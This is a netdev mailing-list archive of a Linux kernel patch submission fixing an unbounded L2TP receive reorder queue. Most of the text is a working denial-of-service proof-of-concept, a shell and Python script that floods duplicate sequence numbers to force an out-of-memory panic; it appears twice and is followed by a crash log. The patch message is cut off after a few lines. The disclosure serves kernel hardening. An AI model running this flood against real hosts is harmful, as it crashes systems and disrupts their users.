Netdev List
 help / color / mirror / Atom feed
* [PATCH net 0/1] l2tp: bound the reorder queue
@ 2026-09-24  0:32 Ren Wei
  2026-09-24  0:32 ` [PATCH net 1/1] " Ren Wei
  0 siblings, 1 reply; 3+ messages in thread
From: Ren Wei @ 2026-09-24  0:32 UTC (permalink / raw)
  To: netdev
  Cc: davem, edumazet, kuba, pabeni, horms, kees, kuniyu, alice.kernel,
	michael.bommarito, mail, jchapman, vega, caoruide123, weir

From: Ruide Cao <caoruide123@gmail.com>

Hi Linux kernel maintainers,

We found an issue in net/l2tp/l2tp_core.c, net/l2tp/l2tp_core.h.

With reordering enabled, l2tp_recv_data_seq() accepts every packet inside
the receive window and l2tp_recv_queue_skb() neither rejects duplicate Ns
values nor limits queue length. A peer can omit the currently expected
packet and send unlimited copies of a future sequence number; every copy is
inserted after a linear queue walk and dequeue remains blocked at the head.
Expiration is checked only when another packet invokes l2tp_recv_dequeue():
there is no timer to service expires. If the peer stops sending before
expiration, all queued skbs remain indefinitely. This permits remote,
non-socket-accounted memory exhaustion and quadratic softirq CPU
consumption.

Privilege model: after an L2TP data session with receive reordering is
present, a remote peer can trigger the unbounded reorder queue by omitting
the expected Ns and sending in-window future sequence numbers. Creating the
local tunnel/session via L2TP genetlink requires CAP_NET_ADMIN in the
owning network namespace; the reproducer below runs that setup as root in
QEMU for convenience. Queued skbs are not charged to a local victim socket.

Compatibility: l2tp receive reorder path only; no uAPI change.

Tested: PoC reproduces OOM with panic_on_oom in QEMU; crash evidence is
below. packetdrill is not used because the trigger depends on sustained
UDP/L2TP sequence flooding into the reorder queue rather than a fixed
packetdrill scripted exchange.

Reproducer:

#!/bin/sh
set -eu

MODE="${1:-oom}"

case "$MODE" in
  observe|oom)
    ;;
  *)
    echo "usage: $0 [observe|oom]" >&2
    exit 1
    ;;
esac

ip link set lo up

if [ "$MODE" = "oom" ] && [ "${PANIC_ON_OOM:-1}" = "1" ]; then
  echo 2 > /proc/sys/vm/panic_on_oom
fi

export MODE

python3 - <<'PY'
import errno
import os
import socket
import struct
import sys
import time

NETLINK_GENERIC = 16
GENL_ID_CTRL = 16

NLM_F_REQUEST = 0x01
NLM_F_ACK = 0x04

NLMSG_NOOP = 1
NLMSG_ERROR = 2
NLMSG_DONE = 3

CTRL_CMD_GETFAMILY = 3
CTRL_ATTR_FAMILY_ID = 1
CTRL_ATTR_FAMILY_NAME = 2

L2TP_GENL_NAME = b"l2tp\x00"
L2TP_GENL_VERSION = 0x1

L2TP_CMD_TUNNEL_CREATE = 1
L2TP_CMD_TUNNEL_DELETE = 2
L2TP_CMD_TUNNEL_MODIFY = 3
L2TP_CMD_TUNNEL_GET = 4
L2TP_CMD_SESSION_CREATE = 5
L2TP_CMD_SESSION_DELETE = 6
L2TP_CMD_SESSION_MODIFY = 7

L2TP_ATTR_NONE = 0
L2TP_ATTR_PW_TYPE = 1
L2TP_ATTR_ENCAP_TYPE = 2
L2TP_ATTR_OFFSET = 3
L2TP_ATTR_DATA_SEQ = 4
L2TP_ATTR_L2SPEC_TYPE = 5
L2TP_ATTR_L2SPEC_LEN = 6
L2TP_ATTR_PROTO_VERSION = 7
L2TP_ATTR_IFNAME = 8
L2TP_ATTR_CONN_ID = 9
L2TP_ATTR_PEER_CONN_ID = 10
L2TP_ATTR_SESSION_ID = 11
L2TP_ATTR_PEER_SESSION_ID = 12
L2TP_ATTR_UDP_CSUM = 13
L2TP_ATTR_VLAN_ID = 14
L2TP_ATTR_COOKIE = 15
L2TP_ATTR_PEER_COOKIE = 16
L2TP_ATTR_DEBUG = 17
L2TP_ATTR_RECV_SEQ = 18
L2TP_ATTR_SEND_SEQ = 19
L2TP_ATTR_LNS_MODE = 20
L2TP_ATTR_USING_IPSEC = 21
L2TP_ATTR_RECV_TIMEOUT = 22
L2TP_ATTR_FD = 23
L2TP_ATTR_IP_SADDR = 24
L2TP_ATTR_IP_DADDR = 25
L2TP_ATTR_UDP_SPORT = 26
L2TP_ATTR_UDP_DPORT = 27

L2TP_PWTYPE_ETH = 0x0005
L2TP_L2SPECTYPE_DEFAULT = 1
L2TP_ENCAPTYPE_UDP = 0
L2TP_HDR_VER_3 = 3
L2TP_SLFLAG_S = 0x40000000


def nlattr(attr_type, payload):
    length = 4 + len(payload)
    pad = (4 - (length & 3)) & 3
    return struct.pack("HH", length, attr_type) + payload + (b"\x00" * pad)


def parse_attrs(data):
    attrs = {}
    off = 0
    while off + 4 <= len(data):
        nla_len, nla_type = struct.unpack_from("HH", data, off)
        if nla_len < 4 or off + nla_len > len(data):
            break
        attrs[nla_type] = data[off + 4: off + nla_len]
        off += (nla_len + 3) & ~3
    return attrs


class GenlSocket:
    def __init__(self):
        self.sock = socket.socket(socket.AF_NETLINK, socket.SOCK_RAW, NETLINK_GENERIC)
        self.sock.bind((0, 0))
        self.seq = 0

    def transact(self, nlmsg_type, cmd, attrs):
        self.seq += 1
        payload = struct.pack("BBH", cmd, L2TP_GENL_VERSION, 0) + b"".join(attrs)
        hdr = struct.pack(
            "IHHII",
            16 + len(payload),
            nlmsg_type,
            NLM_F_REQUEST | NLM_F_ACK,
            self.seq,
            0,
        )
        self.sock.send(hdr + payload)

        while True:
            data = self.sock.recv(65535)
            off = 0
            while off + 16 <= len(data):
                nl_len, nl_type, nl_flags, nl_seq, nl_pid = struct.unpack_from(
                    "IHHII", data, off
                )
                if nl_len < 16 or off + nl_len > len(data):
                    raise RuntimeError("malformed netlink response")
                msg = data[off + 16: off + nl_len]
                off += (nl_len + 3) & ~3

                if nl_seq != self.seq:
                    continue
                if nl_type == NLMSG_ERROR:
                    err = struct.unpack_from("i", msg, 0)[0]
                    if err:
                        raise OSError(-err, os.strerror(-err))
                    return b""
                if nl_type in (NLMSG_DONE, NLMSG_NOOP):
                    return b""
                if nl_type == nlmsg_type or nl_type == GENL_ID_CTRL:
                    return msg

    def resolve_family(self, name):
        attrs = [nlattr(CTRL_ATTR_FAMILY_NAME, name)]
        resp = self.transact(GENL_ID_CTRL, CTRL_CMD_GETFAMILY, attrs)
        attrs = parse_attrs(resp[4:])
        if CTRL_ATTR_FAMILY_ID not in attrs:
            raise RuntimeError("family id not found")
        return struct.unpack("H", attrs[CTRL_ATTR_FAMILY_ID][:2])[0]


def u8_attr(attr_type, value):
    return nlattr(attr_type, struct.pack("B", value))


def u16_attr(attr_type, value):
    return nlattr(attr_type, struct.pack("H", value))


def u32_attr(attr_type, value):
    return nlattr(attr_type, struct.pack("I", value))


def u64_attr(attr_type, value):
    return nlattr(attr_type, struct.pack("Q", value))


def str_attr(attr_type, value):
    return nlattr(attr_type, value.encode() + b"\x00")


def in4_attr(attr_type, addr):
    return nlattr(attr_type, socket.inet_aton(addr))


def mem_available_kb():
    with open("/proc/meminfo", "r", encoding="ascii") as f:
        for line in f:
            if line.startswith("MemAvailable:"):
                return int(line.split()[1])
    return -1


def build_packet(session_id, ns, frame_len):
    if frame_len < 14:
        raise ValueError("frame_len must be at least 14 bytes")
    if frame_len > 65495:
        raise ValueError("frame_len too large for UDP payload")

    hdr = struct.pack("!HHI", L2TP_HDR_VER_3, 0, session_id)
    l2spec = struct.pack("!I", L2TP_SLFLAG_S | (ns & 0x00FFFFFF))
    eth = bytearray(frame_len)
    eth[0:6] = b"\x02\x00\x00\x00\x00\x01"
    eth[6:12] = b"\x02\x00\x00\x00\x00\x02"
    eth[12:14] = b"\x08\x00"
    for i in range(14, frame_len):
        eth[i] = (i - 14) & 0xFF
    return hdr + l2spec + eth


def send_flood(sock, packet, report_every, max_packets):
    sent = 0
    last = time.monotonic()
    while True:
        sock.send(packet)
        sent += 1
        if report_every and sent % report_every == 0:
            now = time.monotonic()
            mem = mem_available_kb()
            rate = report_every / max(now - last, 1e-6)
            print(
                f"[+] sent={sent} mem_available_kb={mem} rate_pps={rate:.1f}",
                flush=True,
            )
            last = now
        if max_packets and sent >= max_packets:
            return sent


def main():
    mode = os.environ.get("MODE", "oom")
    pid = os.getpid() & 0xFFFF
    tunnel_id = int(os.environ.get("TUNNEL_ID", str(1000 + pid)))
    peer_tunnel_id = int(os.environ.get("PEER_TUNNEL_ID", str(2000 + pid)))
    session_id = int(os.environ.get("SESSION_ID", str(3000 + pid)))
    peer_session_id = int(os.environ.get("PEER_SESSION_ID", str(4000 + pid)))
    local_port = int(os.environ.get("LOCAL_PORT", str(10000 + (pid % 20000))))
    peer_port = int(os.environ.get("PEER_PORT", str(local_port + 1)))
    ifname = os.environ.get("IFNAME", f"l2p{pid}")
    payload_len = int(os.environ.get("PAYLOAD_LEN", "60000"))
    if mode == "observe":
        timeout_ms = int(os.environ.get("REORDER_TIMEOUT_MS", "1000"))
        observe_count = int(os.environ.get("OBSERVE_COUNT", "2000"))
        report_every = int(os.environ.get("REPORT_EVERY", "500"))
        max_packets = observe_count
    else:
        timeout_ms = int(os.environ.get("REORDER_TIMEOUT_MS", "300000"))
        report_every = int(os.environ.get("REPORT_EVERY", "250"))
        max_packets = int(os.environ.get("MAX_PACKETS", "0"))

    nl = GenlSocket()
    family_id = nl.resolve_family(L2TP_GENL_NAME)

    session_delete = [
        u32_attr(L2TP_ATTR_CONN_ID, tunnel_id),
        u32_attr(L2TP_ATTR_SESSION_ID, session_id),
    ]
    tunnel_delete = [u32_attr(L2TP_ATTR_CONN_ID, tunnel_id)]
    for cmd, attrs in (
        (L2TP_CMD_SESSION_DELETE, session_delete),
        (L2TP_CMD_TUNNEL_DELETE, tunnel_delete),
    ):
        try:
            nl.transact(family_id, cmd, attrs)
        except OSError as e:
            if e.errno not in (errno.ENODEV, errno.ENOENT):
                raise

    tunnel_create = [
        u32_attr(L2TP_ATTR_CONN_ID, tunnel_id),
        u32_attr(L2TP_ATTR_PEER_CONN_ID, peer_tunnel_id),
        u8_attr(L2TP_ATTR_PROTO_VERSION, 3),
        u16_attr(L2TP_ATTR_ENCAP_TYPE, L2TP_ENCAPTYPE_UDP),
        in4_attr(L2TP_ATTR_IP_SADDR, "127.0.0.1"),
        in4_attr(L2TP_ATTR_IP_DADDR, "127.0.0.1"),
        u16_attr(L2TP_ATTR_UDP_SPORT, local_port),
        u16_attr(L2TP_ATTR_UDP_DPORT, peer_port),
    ]
    nl.transact(family_id, L2TP_CMD_TUNNEL_CREATE, tunnel_create)

    session_create = [
        u32_attr(L2TP_ATTR_CONN_ID, tunnel_id),
        u32_attr(L2TP_ATTR_SESSION_ID, session_id),
        u32_attr(L2TP_ATTR_PEER_SESSION_ID, peer_session_id),
        u16_attr(L2TP_ATTR_PW_TYPE, L2TP_PWTYPE_ETH),
        str_attr(L2TP_ATTR_IFNAME, ifname),
        u8_attr(L2TP_ATTR_L2SPEC_TYPE, L2TP_L2SPECTYPE_DEFAULT),
        u8_attr(L2TP_ATTR_RECV_SEQ, 1),
        u64_attr(L2TP_ATTR_RECV_TIMEOUT, timeout_ms),
    ]
    nl.transact(family_id, L2TP_CMD_SESSION_CREATE, session_create)

    print(
        f"[+] tunnel_id={tunnel_id} session_id={session_id} ifname={ifname} "
        f"local_port={local_port} peer_port={peer_port} timeout_ms={timeout_ms}",
        flush=True,
    )

    sender = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    sender.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    sender.setsockopt(socket.SOL_SOCKET, socket.SO_SNDBUF, 8 << 20)
    sender.bind(("127.0.0.1", peer_port))
    sender.connect(("127.0.0.1", local_port))

    sender.send(build_packet(session_id, 0, 64))
    time.sleep(0.05)

    dup_packet = build_packet(session_id, 2, payload_len)
    before = mem_available_kb()
    print(f"[+] mem_available_kb_before={before}", flush=True)

    sent = send_flood(sender, dup_packet, report_every, max_packets)
    after_flood = mem_available_kb()
    print(f"[+] mem_available_kb_after_flood={after_flood}", flush=True)

    if mode == "observe":
        wait_s = max(timeout_ms / 1000.0 + 1.0, 2.0)
        print(f"[+] waiting_without_packets={wait_s:.1f}s", flush=True)
        time.sleep(wait_s)
        after_idle = mem_available_kb()
        print(f"[+] mem_available_kb_after_idle={after_idle}", flush=True)

        sender.send(dup_packet)
        time.sleep(0.5)
        after_poke = mem_available_kb()
        print(f"[+] mem_available_kb_after_poke={after_poke}", flush=True)
        print(f"[+] observe_done sent={sent}", flush=True)
    else:
        print(f"[+] oom_mode_completed_without_panic sent={sent}", flush=True)


if __name__ == "__main__":
    main()
PY


------BEGIN PoC------

#!/bin/sh
set -eu

MODE="${1:-oom}"

case "$MODE" in
  observe|oom)
    ;;
  *)
    echo "usage: $0 [observe|oom]" >&2
    exit 1
    ;;
esac

ip link set lo up

if [ "$MODE" = "oom" ] && [ "${PANIC_ON_OOM:-1}" = "1" ]; then
  echo 2 > /proc/sys/vm/panic_on_oom
fi

export MODE

python3 - <<'PY'
import errno
import os
import socket
import struct
import sys
import time

NETLINK_GENERIC = 16
GENL_ID_CTRL = 16

NLM_F_REQUEST = 0x01
NLM_F_ACK = 0x04

NLMSG_NOOP = 1
NLMSG_ERROR = 2
NLMSG_DONE = 3

CTRL_CMD_GETFAMILY = 3
CTRL_ATTR_FAMILY_ID = 1
CTRL_ATTR_FAMILY_NAME = 2

L2TP_GENL_NAME = b"l2tp\x00"
L2TP_GENL_VERSION = 0x1

L2TP_CMD_TUNNEL_CREATE = 1
L2TP_CMD_TUNNEL_DELETE = 2
L2TP_CMD_TUNNEL_MODIFY = 3
L2TP_CMD_TUNNEL_GET = 4
L2TP_CMD_SESSION_CREATE = 5
L2TP_CMD_SESSION_DELETE = 6
L2TP_CMD_SESSION_MODIFY = 7

L2TP_ATTR_NONE = 0
L2TP_ATTR_PW_TYPE = 1
L2TP_ATTR_ENCAP_TYPE = 2
L2TP_ATTR_OFFSET = 3
L2TP_ATTR_DATA_SEQ = 4
L2TP_ATTR_L2SPEC_TYPE = 5
L2TP_ATTR_L2SPEC_LEN = 6
L2TP_ATTR_PROTO_VERSION = 7
L2TP_ATTR_IFNAME = 8
L2TP_ATTR_CONN_ID = 9
L2TP_ATTR_PEER_CONN_ID = 10
L2TP_ATTR_SESSION_ID = 11
L2TP_ATTR_PEER_SESSION_ID = 12
L2TP_ATTR_UDP_CSUM = 13
L2TP_ATTR_VLAN_ID = 14
L2TP_ATTR_COOKIE = 15
L2TP_ATTR_PEER_COOKIE = 16
L2TP_ATTR_DEBUG = 17
L2TP_ATTR_RECV_SEQ = 18
L2TP_ATTR_SEND_SEQ = 19
L2TP_ATTR_LNS_MODE = 20
L2TP_ATTR_USING_IPSEC = 21
L2TP_ATTR_RECV_TIMEOUT = 22
L2TP_ATTR_FD = 23
L2TP_ATTR_IP_SADDR = 24
L2TP_ATTR_IP_DADDR = 25
L2TP_ATTR_UDP_SPORT = 26
L2TP_ATTR_UDP_DPORT = 27

L2TP_PWTYPE_ETH = 0x0005
L2TP_L2SPECTYPE_DEFAULT = 1
L2TP_ENCAPTYPE_UDP = 0
L2TP_HDR_VER_3 = 3
L2TP_SLFLAG_S = 0x40000000


def nlattr(attr_type, payload):
    length = 4 + len(payload)
    pad = (4 - (length & 3)) & 3
    return struct.pack("HH", length, attr_type) + payload + (b"\x00" * pad)


def parse_attrs(data):
    attrs = {}
    off = 0
    while off + 4 <= len(data):
        nla_len, nla_type = struct.unpack_from("HH", data, off)
        if nla_len < 4 or off + nla_len > len(data):
            break
        attrs[nla_type] = data[off + 4: off + nla_len]
        off += (nla_len + 3) & ~3
    return attrs


class GenlSocket:
    def __init__(self):
        self.sock = socket.socket(socket.AF_NETLINK, socket.SOCK_RAW, NETLINK_GENERIC)
        self.sock.bind((0, 0))
        self.seq = 0

    def transact(self, nlmsg_type, cmd, attrs):
        self.seq += 1
        payload = struct.pack("BBH", cmd, L2TP_GENL_VERSION, 0) + b"".join(attrs)
        hdr = struct.pack(
            "IHHII",
            16 + len(payload),
            nlmsg_type,
            NLM_F_REQUEST | NLM_F_ACK,
            self.seq,
            0,
        )
        self.sock.send(hdr + payload)

        while True:
            data = self.sock.recv(65535)
            off = 0
            while off + 16 <= len(data):
                nl_len, nl_type, nl_flags, nl_seq, nl_pid = struct.unpack_from(
                    "IHHII", data, off
                )
                if nl_len < 16 or off + nl_len > len(data):
                    raise RuntimeError("malformed netlink response")
                msg = data[off + 16: off + nl_len]
                off += (nl_len + 3) & ~3

                if nl_seq != self.seq:
                    continue
                if nl_type == NLMSG_ERROR:
                    err = struct.unpack_from("i", msg, 0)[0]
                    if err:
                        raise OSError(-err, os.strerror(-err))
                    return b""
                if nl_type in (NLMSG_DONE, NLMSG_NOOP):
                    return b""
                if nl_type == nlmsg_type or nl_type == GENL_ID_CTRL:
                    return msg

    def resolve_family(self, name):
        attrs = [nlattr(CTRL_ATTR_FAMILY_NAME, name)]
        resp = self.transact(GENL_ID_CTRL, CTRL_CMD_GETFAMILY, attrs)
        attrs = parse_attrs(resp[4:])
        if CTRL_ATTR_FAMILY_ID not in attrs:
            raise RuntimeError("family id not found")
        return struct.unpack("H", attrs[CTRL_ATTR_FAMILY_ID][:2])[0]


def u8_attr(attr_type, value):
    return nlattr(attr_type, struct.pack("B", value))


def u16_attr(attr_type, value):
    return nlattr(attr_type, struct.pack("H", value))


def u32_attr(attr_type, value):
    return nlattr(attr_type, struct.pack("I", value))


def u64_attr(attr_type, value):
    return nlattr(attr_type, struct.pack("Q", value))


def str_attr(attr_type, value):
    return nlattr(attr_type, value.encode() + b"\x00")


def in4_attr(attr_type, addr):
    return nlattr(attr_type, socket.inet_aton(addr))


def mem_available_kb():
    with open("/proc/meminfo", "r", encoding="ascii") as f:
        for line in f:
            if line.startswith("MemAvailable:"):
                return int(line.split()[1])
    return -1


def build_packet(session_id, ns, frame_len):
    if frame_len < 14:
        raise ValueError("frame_len must be at least 14 bytes")
    if frame_len > 65495:
        raise ValueError("frame_len too large for UDP payload")

    hdr = struct.pack("!HHI", L2TP_HDR_VER_3, 0, session_id)
    l2spec = struct.pack("!I", L2TP_SLFLAG_S | (ns & 0x00FFFFFF))
    eth = bytearray(frame_len)
    eth[0:6] = b"\x02\x00\x00\x00\x00\x01"
    eth[6:12] = b"\x02\x00\x00\x00\x00\x02"
    eth[12:14] = b"\x08\x00"
    for i in range(14, frame_len):
        eth[i] = (i - 14) & 0xFF
    return hdr + l2spec + eth


def send_flood(sock, packet, report_every, max_packets):
    sent = 0
    last = time.monotonic()
    while True:
        sock.send(packet)
        sent += 1
        if report_every and sent % report_every == 0:
            now = time.monotonic()
            mem = mem_available_kb()
            rate = report_every / max(now - last, 1e-6)
            print(
                f"[+] sent={sent} mem_available_kb={mem} rate_pps={rate:.1f}",
                flush=True,
            )
            last = now
        if max_packets and sent >= max_packets:
            return sent


def main():
    mode = os.environ.get("MODE", "oom")
    pid = os.getpid() & 0xFFFF
    tunnel_id = int(os.environ.get("TUNNEL_ID", str(1000 + pid)))
    peer_tunnel_id = int(os.environ.get("PEER_TUNNEL_ID", str(2000 + pid)))
    session_id = int(os.environ.get("SESSION_ID", str(3000 + pid)))
    peer_session_id = int(os.environ.get("PEER_SESSION_ID", str(4000 + pid)))
    local_port = int(os.environ.get("LOCAL_PORT", str(10000 + (pid % 20000))))
    peer_port = int(os.environ.get("PEER_PORT", str(local_port + 1)))
    ifname = os.environ.get("IFNAME", f"l2p{pid}")
    payload_len = int(os.environ.get("PAYLOAD_LEN", "60000"))
    if mode == "observe":
        timeout_ms = int(os.environ.get("REORDER_TIMEOUT_MS", "1000"))
        observe_count = int(os.environ.get("OBSERVE_COUNT", "2000"))
        report_every = int(os.environ.get("REPORT_EVERY", "500"))
        max_packets = observe_count
    else:
        timeout_ms = int(os.environ.get("REORDER_TIMEOUT_MS", "300000"))
        report_every = int(os.environ.get("REPORT_EVERY", "250"))
        max_packets = int(os.environ.get("MAX_PACKETS", "0"))

    nl = GenlSocket()
    family_id = nl.resolve_family(L2TP_GENL_NAME)

    session_delete = [
        u32_attr(L2TP_ATTR_CONN_ID, tunnel_id),
        u32_attr(L2TP_ATTR_SESSION_ID, session_id),
    ]
    tunnel_delete = [u32_attr(L2TP_ATTR_CONN_ID, tunnel_id)]
    for cmd, attrs in (
        (L2TP_CMD_SESSION_DELETE, session_delete),
        (L2TP_CMD_TUNNEL_DELETE, tunnel_delete),
    ):
        try:
            nl.transact(family_id, cmd, attrs)
        except OSError as e:
            if e.errno not in (errno.ENODEV, errno.ENOENT):
                raise

    tunnel_create = [
        u32_attr(L2TP_ATTR_CONN_ID, tunnel_id),
        u32_attr(L2TP_ATTR_PEER_CONN_ID, peer_tunnel_id),
        u8_attr(L2TP_ATTR_PROTO_VERSION, 3),
        u16_attr(L2TP_ATTR_ENCAP_TYPE, L2TP_ENCAPTYPE_UDP),
        in4_attr(L2TP_ATTR_IP_SADDR, "127.0.0.1"),
        in4_attr(L2TP_ATTR_IP_DADDR, "127.0.0.1"),
        u16_attr(L2TP_ATTR_UDP_SPORT, local_port),
        u16_attr(L2TP_ATTR_UDP_DPORT, peer_port),
    ]
    nl.transact(family_id, L2TP_CMD_TUNNEL_CREATE, tunnel_create)

    session_create = [
        u32_attr(L2TP_ATTR_CONN_ID, tunnel_id),
        u32_attr(L2TP_ATTR_SESSION_ID, session_id),
        u32_attr(L2TP_ATTR_PEER_SESSION_ID, peer_session_id),
        u16_attr(L2TP_ATTR_PW_TYPE, L2TP_PWTYPE_ETH),
        str_attr(L2TP_ATTR_IFNAME, ifname),
        u8_attr(L2TP_ATTR_L2SPEC_TYPE, L2TP_L2SPECTYPE_DEFAULT),
        u8_attr(L2TP_ATTR_RECV_SEQ, 1),
        u64_attr(L2TP_ATTR_RECV_TIMEOUT, timeout_ms),
    ]
    nl.transact(family_id, L2TP_CMD_SESSION_CREATE, session_create)

    print(
        f"[+] tunnel_id={tunnel_id} session_id={session_id} ifname={ifname} "
        f"local_port={local_port} peer_port={peer_port} timeout_ms={timeout_ms}",
        flush=True,
    )

    sender = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    sender.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    sender.setsockopt(socket.SOL_SOCKET, socket.SO_SNDBUF, 8 << 20)
    sender.bind(("127.0.0.1", peer_port))
    sender.connect(("127.0.0.1", local_port))

    sender.send(build_packet(session_id, 0, 64))
    time.sleep(0.05)

    dup_packet = build_packet(session_id, 2, payload_len)
    before = mem_available_kb()
    print(f"[+] mem_available_kb_before={before}", flush=True)

    sent = send_flood(sender, dup_packet, report_every, max_packets)
    after_flood = mem_available_kb()
    print(f"[+] mem_available_kb_after_flood={after_flood}", flush=True)

    if mode == "observe":
        wait_s = max(timeout_ms / 1000.0 + 1.0, 2.0)
        print(f"[+] waiting_without_packets={wait_s:.1f}s", flush=True)
        time.sleep(wait_s)
        after_idle = mem_available_kb()
        print(f"[+] mem_available_kb_after_idle={after_idle}", flush=True)

        sender.send(dup_packet)
        time.sleep(0.5)
        after_poke = mem_available_kb()
        print(f"[+] mem_available_kb_after_poke={after_poke}", flush=True)
        print(f"[+] observe_done sent={sent}", flush=True)
    else:
        print(f"[+] oom_mode_completed_without_panic sent={sent}", flush=True)


if __name__ == "__main__":
    main()
PY


------END PoC--------

----BEGIN crash log----

[  317.147298][T10616] Kernel panic - not syncing: Out of memory: compulsory panic_on_oom is enabled
[  317.148195][T10616] CPU: 3 UID: 0 PID: 10616 Comm: python3 Not tainted 6.12.95 #2
[  317.148753][T10616] Hardware name: QEMU Ubuntu 24.04 PC v2 (i440FX + PIIX, arch_caps fix, 1996), BIOS 1.16.3-debian-1.16.3-2 04/01/2014
[  317.149890][T10616] Call Trace:
[  317.150119][T10616]  <TASK>
[  317.150313][T10616]  panic+0x533/0x610
[  317.150599][T10616]  ? __pfx_panic+0x10/0x10
[  317.150911][T10616]  ? srso_alias_return_thunk+0x5/0xfbef5
[  317.151282][T10616]  ? lockdep_hardirqs_on+0x7b/0x110
[  317.151626][T10616]  ? _raw_spin_unlock_irqrestore+0x40/0x80
[  317.152045][T10616]  ? srso_alias_return_thunk+0x5/0xfbef5
[  317.152410][T10616]  ? rcu_is_watching+0x12/0xc0
[  317.152737][T10616]  out_of_memory+0x73c/0x1430
[  317.153070][T10616]  ? __alloc_pages_noprof+0xd53/0x26d0
[  317.153444][T10616]  ? __pfx_out_of_memory+0x10/0x10
[  317.153788][T10616]  ? lock_acquire+0x2f/0xb0
[  317.154097][T10616]  ? __alloc_pages_noprof+0xd53/0x26d0
[  317.154472][T10616]  __alloc_pages_noprof+0x1ecc/0x26d0
[  317.154839][T10616]  ? srso_alias_return_thunk+0x5/0xfbef5
[  317.155263][T10616]  ? find_held_lock+0x2d/0x110
[  317.155579][T10616]  ? __pfx___alloc_pages_noprof+0x10/0x10
[  317.155940][T10616]  ? srso_alias_return_thunk+0x5/0xfbef5
[  317.156325][T10616]  ? __pfx_lock_release+0x10/0x10
[  317.156670][T10616]  ? __might_fault+0xb6/0x120
[  317.157041][T10616]  alloc_pages_mpol_noprof+0x1ab/0x4d0
[  317.157420][T10616]  ? __pfx_alloc_pages_mpol_noprof+0x10/0x10
[  317.157801][T10616]  ? srso_alias_return_thunk+0x5/0xfbef5
[  317.158185][T10616]  ? __virt_addr_valid+0x1f3/0x3d0
[  317.158520][T10616]  ? __check_object_size+0x2eb/0x4f0
[  317.158876][T10616]  skb_page_frag_refill+0x1d0/0x300
[  317.160172][T10616]  ? srso_alias_return_thunk+0x5/0xfbef5
[  317.160548][T10616]  sk_page_frag_refill+0x52/0x2c0
[  317.160913][T10616]  __ip_append_data+0x94a/0x4150
[  317.161268][T10616]  ? __pfx_ip_generic_getfrag+0x10/0x10
[  317.161688][T10616]  ? srso_alias_return_thunk+0x5/0xfbef5
[  317.162079][T10616]  ? ip_dst_mtu_maybe_forward.constprop.0+0x29b/0x590
[  317.162585][T10616]  ? __pfx___ip_append_data+0x10/0x10
[  317.162934][T10616]  ? __pfx___lock_acquire+0x10/0x10
[  317.163300][T10616]  ip_make_skb+0x211/0x2d0
[  317.163597][T10616]  ? find_held_lock+0x2d/0x110
[  317.163922][T10616]  ? __pfx_ip_generic_getfrag+0x10/0x10
[  317.164302][T10616]  ? __pfx_ip_make_skb+0x10/0x10
[  317.164617][T10616]  ? ipv4_dst_check+0x164/0x2b0
[  317.164959][T10616]  ? srso_alias_return_thunk+0x5/0xfbef5
[  317.165371][T10616]  ? srso_alias_return_thunk+0x5/0xfbef5
[  317.165744][T10616]  ? udp_sendmsg+0x155b/0x2370
[  317.166078][T10616]  udp_sendmsg+0x155b/0x2370
[  317.166391][T10616]  ? __pfx_aa_label_sk_perm+0x10/0x10
[  317.166746][T10616]  ? __pfx_ip_generic_getfrag+0x10/0x10
[  317.167147][T10616]  ? __pfx_udp_sendmsg+0x10/0x10
[  317.167477][T10616]  ? hlock_class+0x4e/0x130
[  317.167770][T10616]  ? srso_alias_return_thunk+0x5/0xfbef5
[  317.168202][T10616]  ? __sys_sendto+0x32e/0x3a0
[  317.168499][T10616]  __sys_sendto+0x32e/0x3a0
[  317.168797][T10616]  ? __pfx___sys_sendto+0x10/0x10
[  317.169198][T10616]  ? __pfx_lock_release+0x10/0x10
[  317.169571][T10616]  ? srso_alias_return_thunk+0x5/0xfbef5
[  317.169945][T10616]  ? rcu_is_watching+0x12/0xc0
[  317.170764][T10616]  __x64_sys_sendto+0xe0/0x1c0
[  317.171083][T10616]  ? do_syscall_64+0x93/0x270
[  317.171389][T10616]  ? srso_alias_return_thunk+0x5/0xfbef5
[  317.171803][T10616]  ? lockdep_hardirqs_on+0x7b/0x110
[  317.172154][T10616]  do_syscall_64+0xc7/0x270
[  317.172516][T10616]  entry_SYSCALL_64_after_hwframe+0x77/0x7f
[  317.173593][T10616] RIP: 0033:0x7f5fabf45687
[  317.173886][T10616] Code: 48 89 fa 4c 89 df e8 58 b3 00 00 8b 93 08 03 00 00 59 5e 48 83 f8 fc 74 1a 5b c3 0f 1f 84 00 00 00 00 00 48 8b 44 24 10 0f 05 <5b> c3 0f 1f 80 00 00 00 00 83 e2 39 83 fa 08 75 de e8 23 ff ff ff
[  317.175212][T10616] RSP: 002b:00007ffe2aaccb60 EFLAGS: 00000202 ORIG_RAX: 000000000000002c
[  317.175763][T10616] RAX: ffffffffffffffda RBX: 00007f5fabeb1780 RCX: 00007f5fabf45687
[  317.176303][T10616] RDX: 000000000000ea6c RSI: 0000000034d07590 RDI: 0000000000000004
[  317.176857][T10616] RBP: 0000000000000000 R08: 0000000000000000 R09: 0000000000000000
[  317.177380][T10616] R10: 0000000000000000 R11: 0000000000000202 R12: 0000000000000000
[  317.177895][T10616] R13: 0000000000000000 R14: 00000000006ff020 R15: 0000000000a83590
[  317.178445][T10616]  </TASK>
[  317.178849][T10616] Kernel Offset: disabled
[  317.179211][T10616] Rebooting in 86400 seconds..


-----END crash log-----

Best regards,
Ruide Cao


Ruide Cao (1):
  l2tp: bound the reorder queue

 net/l2tp/l2tp_core.c | 57 +++++++++++++++++++++++++++++++++++++++++---
 net/l2tp/l2tp_core.h |  2 ++
 2 files changed, 56 insertions(+), 3 deletions(-)

base-commit: 24ef02f934eeb48830cff6b739abc3c62b1d107b

-- 
2.47.3


^ permalink raw reply	[flat|nested] 3+ messages in thread

* [PATCH net 1/1] l2tp: bound the reorder queue
  2026-09-24  0:32 [PATCH net 0/1] l2tp: bound the reorder queue Ren Wei
@ 2026-09-24  0:32 ` Ren Wei
  2026-09-24  7:17   ` Eric Dumazet
  0 siblings, 1 reply; 3+ messages in thread
From: Ren Wei @ 2026-09-24  0:32 UTC (permalink / raw)
  To: netdev
  Cc: davem, edumazet, kuba, pabeni, horms, kees, kuniyu, alice.kernel,
	michael.bommarito, mail, jchapman, vega, caoruide123, weir

From: Ruide Cao <caoruide123@gmail.com>

The receive-window check accepts every sequence number in the large
window. If the peer omits the expected packet, distinct future packets
